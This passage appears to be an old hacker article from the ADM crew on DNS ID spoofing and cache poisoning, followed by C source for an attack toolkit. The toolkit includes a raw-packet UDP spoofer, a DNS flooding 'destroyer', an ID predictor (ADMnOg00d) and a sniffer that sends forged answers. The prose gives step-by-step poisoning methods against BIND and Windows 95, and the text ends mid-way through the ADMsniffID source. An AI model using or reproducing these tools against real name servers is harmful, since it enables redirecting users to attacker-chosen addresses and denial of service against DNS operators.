+---------------------------------+--------------------------------------+ | ID = 1999 | QR = 0 opcode = 0 RD = 1 | +---------------------------------+--------------------------------------+ | numbers of questions = htons(1) | numbers of answers = 0 | +---------------------------------+--------------------------------------+ | number of RR authoritative = 0 | number of supplementary RR = 0 | +---------------------------------+--------------------------------------+ +------------------------------------------------------------------------+ | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +------------------------------------------------------------------------+ | type of question = htons(1) | type of query=htons(1) | +---------------------------------+--------------------------------------+ here is for the question. now let's stare the answer of ns.heike.com ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53 +---------------------------------+---------------------------------------+ | ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 | +---------------------------------+---------------------------------------+ | numbers of questions = htons(1) | numbers of answers = htons(1) | +---------------------------------+---------------------------------------+ | number of RR authoritative = 0 | number of supplementary RR = 0 | +---------------------------------+---------------------------------------+ +-------------------------------------------------------------------------+ | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +-------------------------------------------------------------------------+ | type of question = htons(1) | type of query = htons(1) | +-------------------------------------------------------------------------+ +-------------------------------------------------------------------------+ | name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +-------------------------------------------------------------------------+ | type = htons(1) | class = htons(1) | +-------------------------------------------------------------------------+ | time to live = 999999 | +-------------------------------------------------------------------------+ | resource data length = htons(4) | resource data=inet_addr("31.33.7.44") | +-------------------------------------------------------------------------+ Yah! That's all for now :)) Here is an analysis: In the answer QR = 1 because it's an answer :) AA = 1 because the name server has authority in its domain RA = 1 because recursion is available Good =) I hope you understood that cause you will need it for the following events. --[2.0]-- DNS ID hack/spoof Now it's time to explain clearly what DNS ID hacking/spoofing is. Like I explained before, the only way for the DNS daemon to recognize the different questions/answers is the ID flag in the packet. Look at this example: ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53 So you only have to spoof the ip of ns.heike.com and answer your false information before ns.heike.com to ns.bibi.com! ns.bibi.com <------- . . . . . . . . . . . ns.heike.com | |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com But in practice you have to guess the good ID :) If you are on a LAN, you can sniff to get this ID and answer before the name server (it's easy on a Local Network :) If you want to do this remotely you don't have a lot a choices, you only have 4 basics methods: 1.) Randomly test all the possible values of the ID flag. You must answer before the ns ! (ns.heike.com in this example). This method is obsolete unless you want to know the ID .. or any other favorable condition to its prediction. 2.) Send some DNS requests (200 or 300) in order to increase the chances of falling on the good ID. 3.) Flood the DNS in order to avoid its work. The name server will crash and show the following error! >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT at this time named daemon is out of order :) 4.) Or you can use the vulnerability in BIND discovered by SNI (Secure Networks, Inc.) with ID prediction (we will discuss this in a bit). ##################### Windows ID Vulnerability ########################### I found a heavy vulnerability in Windows 95 (I haven't tested it on WinNT), lets imagine my little friend that's on Windows 95. Windows ID's are extremely easy to predict because it's "1" by default :))) and "2" for the second question (if they are 2 questions at the same time). ######################## BIND Vulnerability ############################## There is a vulnerability in BIND (discovered by SNI as stated earlier). In fact, DNS IS are easily predictable, you only have to sniff a DNS in order to do what you want. Let me explain... The DNS uses a random ID at the beginning but it only increase this ID for next questions ... =))) It's easy to exploit this vulnerability. Here is the way: 1. Be able to sniff easily the messages that comes to a random DNS (ex. ns.dede.com for this sample). 2. You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will ask to ns.dede.com to resolve (random).dede.com ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com 3. Now you have the ID of the message from NS.victim.com, now you know what ID area you'll have to use. (ID = 444 in this sample). 4. You then make your resolution request. ex. www.microsoft.com to NS.victim.com (you) ---> [?www.microsoft.com] ---> ns.victim.com ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com 5. Flood the name server ns.victim.com with the ID (444) you already have and then you increase this one. ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com (now you know that DNS IDs are predictable, and they only increase. You flood ns.victim.com with spoofed answers with the ID 444+ ;) *** ADMsnOOfID does this. There is another way to exploit this vulnerability without a root on any DNS The mechanism is very simple. Here is the explanation We send to ns.victim.com a resolution request for *.provnet.fr (you) ----------[?(random).provnet.fr] -------> ns.victim.com Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr. There is nothing new here, but the interesting part begins here. From this point you begin to flood ns.victim.com with spoofed answers (with ns1.provnet.fr IP) with ids from 100 to 110... (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com ..... After that, we ask ns.victim.com if (random).provnet.fr has an IP. If ns.victim.com give us an IP for (random).provnet.fr then we have found the correct ID :) Otherwise we have to repeat this attack until we find the ID. It's a bit long but it's effective. And nothing forbids you to do this with friends ;) This is how ADMnOg00d works ;) ------------------------------- ########################################################################## Here you will find 5 programs ADMkillDNS - very simple DNS spoofer ADMsniffID - sniff a LAN and reply false DNS answers before the NS ADMsnOOfID - a DNS ID spoofer (you'll need to be root on a NS) ADMnOg00d - a DNS ID predictor (no need to be root on a NS) ADNdnsfuckr - a very simple denial of service attack to disable DNS Have fun!! :) Note: You can find source and binaries of this progs at ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would be on janova. You need to install libpcap on your machine before any compilation of the ADMID proggies :) ADM Crew. Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love these guys) Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at www.secnet.com for finding the vulnerability =) <++> ADMIDpack/ADM-spoof.c /************************************************************************/ /* ADM spoofing routine for spoof udp */ /************************************************************************/ #define IPHDRSIZE sizeof(struct iphdr) #define UDPHDRSIZE sizeof(struct udphdr) #include #include #include #include #include #include #include #include #include #include #include #include "ip.h" #include "udp.h" /*****************************************************************************/ /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ /*****************************************************************************/ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } int udp_send(s,saddr,daddr,sport,dport,datagram,datasize) int s; unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; char * datagram; unsigned datasize; { struct sockaddr_in sin; struct iphdr *ip; struct udphdr *udp; unsigned char *data; unsigned char packet[4024]; int x; ip = (struct iphdr *)packet; udp = (struct udphdr *)(packet+IPHDRSIZE); data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE); memset(packet,0,sizeof(packet)); udp->source = htons(sport); udp->dest = htons(dport); udp->len = htons(UDPHDRSIZE+datasize); udp->check = 0; memcpy(data,datagram,datasize); memset(packet,0,IPHDRSIZE); ip->saddr.s_addr = saddr; ip->daddr.s_addr = daddr; ip->version = 4; ip->ihl = 5; ip->ttl = 245; ip->id = random()%5985; ip->protocol = IPPROTO_UDP; ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize); ip->check = 0; ip->check = in_cksum((char *)packet,IPHDRSIZE); sin.sin_family=AF_INET; sin.sin_addr.s_addr=daddr; sin.sin_port=udp->dest; x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)); return(x); } /*****************************************************************************/ /* RECV PAKET */ /* get_pkt(socket, *buffer , size of the buffer); */ /*****************************************************************************/ int get_pkt(s,data,size) int s; unsigned char *data; int size; { struct sockaddr_in sin; int len,resu; len= sizeof(sin); resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len); return resu; } <--> <++> ADMIDpack/ADMDNS2.c /*************************************************/ /* DNS include for play with DNS packet (c) ADM */ /*************************************************/ #define ERROR -1 #define DNSHDRSIZE 12 #define TYPE_A 1 #define TYPE_PTR 12 int myrand() { int j; j=1+(int) (150.0*rand()/(RAND_MAX+1.0)); return(j); } unsigned long host2ip(char *serv) { struct sockaddr_in sinn; struct hostent *hent; hent=gethostbyname(serv); if(hent == NULL) return 0; bzero((char *)&sinn, sizeof(sinn)); bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length); return sinn.sin_addr.s_addr; } void nameformat(char *name,char *QS) { /* CRAP & LAme COde :) */ char lol[3000]; char tmp[2550]; char tmp2[2550]; int i,a=0; bzero(lol,sizeof(lol)); bzero(tmp,sizeof(tmp)); bzero(tmp2,sizeof(tmp2)); for(i=0;iid = 6000+myrand(); dns->qr = 0; dns->rd = 1; dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,name,type); udp_send(sraw,s_ip,d_ip,1200+myrand,53,buff,DNSHDRSIZE+i); close(sraw); } void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type) { struct dnshdr *dns; char buff[1024]; char *data; int i; int on=1; int sraw; if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } dns = (struct dnshdr *) buff; data = (char *)(buff+DNSHDRSIZE); bzero(buff,sizeof(buff)); dns->id = htons(ID); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); i=makepaketAW(data,name,spoofip,type); printf(" I apres Makepaket == %i \n",i); udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i); close(sraw); } void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type) { struct dnshdr *dns; char buff[1024]; char *data; u_long fakeip; u_long trustip; u_long victimip; int loop,rere; dns = (struct dnshdr *)buff; data = (char *)(buff+DNSHDRSIZE); trustip = host2ip(dnstrust); victimip = host2ip(victim); fakeip = host2ip("12.1.1.0"); /* send question ... */ if( type == TYPE_PTR) for(loop=0;loop<4;loop++)sendquestion(fakeip,victimip,spoofip,type); if( type == TYPE_A) for(loop=0;loop<4;loop++) sendquestion(fakeip,victimip,spoofname,type); /* now its time to awnser Quickly !!! */ for(rere = 0; rere < 2;rere++){ for(loop=0;loop < 80;loop++){ printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n", dnstrust,victim,spoofname,spoofip,ID+loop,type); sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type); } } } <--> <++> ADMIDpack/ADMdnsfuckr.c /* ADM DNS DESTROYER */ #define DNSHDRSIZE 12 #define VERSION "0.2 pub" #define ERROR -1 #include #include #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" void main(int argc, char **argv) { struct dnshdr *dns; char *data; char buffer2[4000]; unsigned char namez[255]; unsigned long s_ip; unsigned long d_ip; int sraw,on=1; if(argc <2){printf(" usage : %s \n",argv[0]); exit(0);} dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+12); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n",VERSION); printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n"); sleep(1); s_ip=host2ip("100.1.2.3"); d_ip=host2ip(argv[1]); dns->id = 123; dns->rd = 1; dns->que_num = htons(1); while(1){ sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand()); printf("%s\n",namez); strcpy(data,namez); *( (u_short *) (data+strlen(namez)+1) ) = ntohs(12); *( (u_short *) (data+strlen(namez)+3) ) = ntohs(1); udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5); s_ip=ntohl(s_ip); s_ip++; s_ip=htonl(s_ip); } } <--> <++> ADMIDpack/ADMkillDNS.c #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #define ERROR -1 #define VERSION "0.3 pub" #define ID_START 1 #define ID_STOP 65535 #define PORT_START 53 #define PORT_STOP 54 void main(int argc, char **argv) { struct dnshdr *dns; char *data; char buffer2[4000]; unsigned char namez[255]; unsigned long s_ip,s_ip2; unsigned long d_ip,d_ip2; int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop; if(argc <5){ system("/usr/bin/clear"); printf(" usage : %s \n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]); printf(" ip src: ip source of the dns anwser\n"); printf(" ip dst: ip of the dns victim\n"); printf(" name : spoof name ex: www.dede.com\n"); printf(" ip : the ip associate with the name\n"); printf(" options \n"); printf(" [A,B,N] \n"); printf(" A: flood the DNS victim with multiple query\n"); printf(" B: DOS attack for destroy the DNS \n"); printf(" N: None attack \n\n"); printf(" [ID_START] \n"); printf(" ID_START: id start :> \n\n"); printf(" [ID_STOP] n"); printf(" ID_STOP : id stop :> \n\n"); printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n"); printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION); exit(ERROR); } dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMkillDNS %s",VERSION); printf("\nouais ben mwa je dedie ca a ma Heike"); printf("\nREADY FOR ACTION!\n"); s_ip2=s_ip=host2ip(argv[1]); d_ip2=d_ip=host2ip(argv[2]); if(argc>5)if(*argv[5]=='A') { for(loop=0;loop<10;loop++){ dns->id = 6000+loop; dns->qr = 0; dns->rd = 1; dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,argv[3],TYPE_A); udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i); s_ip=ntohl(s_ip); s_ip++; s_ip=htonl(s_ip); } } /* end of DNS flood query */ /* ici on trouve la routine contre un DOS */ if(argc>5)if(*argv[5]=='B') { s_ip=host2ip("100.1.2.3"); dns->id = 123; dns->rd = 1; dns->que_num = htons(1); printf("plz enter the number of packet u wanna send\n"); scanf("%i",&i); for(x=0;x 6 )idstart = atoi(argv[6]); else idstart = ID_START; if(argc > 7 )idstop = atoi(argv[7]); else idstop = ID_STOP; if(argc > 8 ){ portstart = atoi(argv[8]); portstop = atoi(argv[9]); } else { portstart = PORT_START; portstop = PORT_STOP; } bzero(buffer2,sizeof(buffer2)); bzero(namez,sizeof(namez)); i=0; x=0; s_ip=s_ip2; d_ip=d_ip2; for(;idstartid = htons(idstart); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop); i=makepaketAW(data,argv[3],argv[4],TYPE_A); for(;x < portstop; x++) udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i); x = portstart; } printf(" terminated..\n"); } <--> <++> ADMIDpack/ADMnOg00d.c /***************************/ /* ADMnog00d (c) ADM */ /***************************/ /* ADM DNS ID PREDICTOR */ /***************************/ #include #include #include "dns.h" #include "ADM-spoof.c" #include "ADMDNS2.c" #define VERSION "0.7 pub" #define SPOOFIP "4.4.4.4" #define ERROR -1 #define LEN sizeof(struct sockaddr) #define UNDASPOOF "111.111.111.111" #define TIMEOUT 300 #define DNSHDRSIZE 12 void usage() { printf(" ADMnoG00D [ID] \n"); printf("\n ex: ADMnoG00d ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n"); printf(" well... we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 31.3.3.7\n"); printf(" we use provnet.fr and ns1.provnet for find ID of ns.victim.com\n"); printf(" we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n"); printf(" for more information..\n"); printf(" check ftp.janova.org/pub/ADM/ \n"); printf(" mail ADM@janova.org \n"); printf(" ask Heike from me...:) \n"); exit(-1); } void senddnspkt(s,d_ip,wwwname,ip,dns) int s; u_long d_ip; char *wwwname; char *ip; struct dnshdr *dns; { struct sockaddr_in sin; int i; char buffer[1024]; char *data = (char *)(buffer+DNSHDRSIZE); bzero(buffer,sizeof(buffer)); memcpy(buffer,dns,DNSHDRSIZE); if(dns->qr == 0) { i=makepaketQS(data,wwwname,TYPE_A); sin.sin_family = AF_INET; sin.sin_port = htons(53); sin.sin_addr.s_addr = d_ip; sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN); } else { i=makepaketAW(data,wwwname,ip,TYPE_A); sin.sin_family = AF_INET; sin.sin_port = htons(53); sin.sin_addr.s_addr = d_ip; sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN); } } void dns_qs_no_rd(s,d_ip,wwwname,ID) int s; u_long d_ip; char *wwwname; int ID; { struct dnshdr *dns; char *data; char buffer[1024]; int i; dns = (struct dnshdr *)buffer; data = (char *)(buffer+DNSHDRSIZE); bzero(buffer,sizeof(buffer)); dns->id = htons(ID); dns->qr = 0; dns->rd = 0; /* dont want the recusion !! */ dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,wwwname,TYPE_A); senddnspkt(s,d_ip,wwwname,NULL,dns); } void main(int argc, char **argv) { struct sockaddr_in sin_rcp; struct dnshdr *dns, *dns_recv; char *data, *data2; char buffer2[4000]; char buffer[4000]; char spoofname[255]; char spoofip[255]; char dnstrust[255]; char bla[255]; char *alacon; unsigned char fakename[255]; unsigned char namez[255]; unsigned long s_ip, s_ip2; unsigned long d_ip, d_ip2, trust; unsigned int DA_ID = 65535, loop = 65535; int sraw, s_r, i, on=1, x, ID,timez; int len = sizeof(struct sockaddr); dns_recv = (struct dnshdr *)(buffer); data2 = (char *)(buffer+DNSHDRSIZE); dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); srand(time(NULL)); if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){ perror("socket"); exit(ERROR); } if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ){ perror("fcntl"); exit(ERROR); } if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){ perror("setsockopt"); exit(ERROR); } if(argc < 2) usage(); if(argc > 9 )DA_ID = loop = atoi(argv[9]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if( argc > 8 ) strcpy(bla,argv[8]); else{ printf("enter the DNS trust of the victim:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); printf("ADMnoG00d %s\n",VERSION); printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n"); sleep(1); printf("\nLets Play =)!!\n"); /* save some param */ s_ip2 = host2ip(argv[1]); d_ip2 = d_ip = host2ip(argv[4]); trust = host2ip(argv[2]); s_ip = host2ip(UNDASPOOF); while(1){ sprintf(fakename,"%i%i%i%i%i%i.%s", myrand(), myrand(), myrand(), myrand(), myrand(), myrand(), argv[3]); sendquestion(s_ip,d_ip,fakename,TYPE_A); /* end of question packet */ bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ bzero(namez,sizeof(namez)); i=0; x=0; /* here start the spoof anwser */ ID = loop; for(;loop >= ID-10 ;loop--){ dns->id = htons(loop); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); i=makepaketAW(data,fakename,SPOOFIP,TYPE_A); udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i); } bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ bzero(namez,sizeof(namez)); i=0; x=0; /* time for test spoof */ dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */ /* non recursive ! */ /* we waiting for awnser ... */ while(1){ for(timez=0;timez < TIMEOUT; timez++){ if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 ) { printf("ok whe have the reponse ;)\n"); timez = 0; break; } usleep(10); timez++; } if(timez != 0){ printf("hum no reponse from the NS ressend question..\n"); dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); } else break; } /* ok we have a awnser */ printf("fakename = %s\n",fakename); if(sin_rcp.sin_addr.s_addr == d_ip2 ) if(sin_rcp.sin_port == htons(53) ) { if( dns_recv->qr == 1 ) if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */ printf("try %i < ID < %i \n",ID-10,ID); else{ /* Hoho we have the spoof has worked we have found the right ID ! */ printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop); printf("let's send the spoof...\n"); dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5])); printf("spoof sended ...\n"); exit(0); } } /* end of if (sin_rcp.sin_port == htons(53) ) */ bzero(buffer,sizeof(buffer)); } /* end of while loop */ }/* end of proggies */ <--> <++> ADMIDpack/ADMsnOOfID.c #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #include #include #define DNSHDRSIZE 12 #define SPOOF "127.0.0.1" #define VERSION "ver 0.6 pub" #define ERROR -1 int ETHHDRSIZE; void main(argc, argv) int argc; char *argv[]; { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char namefake[255]; char buffer2[1024]; char ebuf[255]; char spoofname[255]; char spoofip[255]; char bla[255]; char dnstrust[255]; char *alacon; unsigned long s_ipns; unsigned long d_ip; int sraw, i, on=1, con, ID,DA_ID,type; srand( (time(NULL) % random() * random()) ); if(argc <2){ printf("usage : %s \n",argv[0]); printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr \n",argv[0]); printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); exit(0); } if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; else ETHHDRSIZE = 14; if(argc>5)type=atoi(argv[5]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if(argc > 8)strcpy(bla,argv[8]); else{ printf("enter the dns trust for the spoof\n"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION); printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n"); sleep(1); pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf); s_ipns = host2ip(argv[4]); d_ip = host2ip(argv[2]); con = myrand(); /* make the question for get the ID */ sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]); dnssend->id = 2600; dnssend->qr = 0; dnssend->rd = 1; dnssend->aa = 0; dnssend->que_num = htons(1); dnssend->rep_num = htons(0); i = makepaketQS(data2,namefake,TYPE_A); udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i); printf("Question sended...\n"); printf("Its Time to w8 \n"); while(1) { buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == IPPROTO_UDP){ printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source)); printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest)); } if(ip->protocol == 17 ) if(ip->saddr.s_addr == d_ip ) if(ip->daddr.s_addr == s_ipns ) if(udp->dest == htons(53) ) if(dnsrecv->qr == 0 ) { printf("kewl :)~ we have the packet !\n"); ID = dnsrecv->id ; /* we get the id */ printf("the current id of %s is %d \n",argv[2],ntohs(ID)); DA_ID = ntohs(ID); printf("send the spoof...\n"); dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type); printf("spoof sended...\n"); exit(0); } } /* well now we have the ID we cant predict the ID */ } <--> <++> ADMIDpack/ADMsniffID.c #include #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #define ERROR -1 #define DNSHDRSIZE 12 #define VERSION "ver 0.4 pub" int ETHHDRSIZE; void usage(){ printf("usage : ADMsniffID \n"); printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n"); exit(ERROR); } void main(int argc, char **argv) { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char SPOOFIP[255]; char bla[255]; char spoofname[255];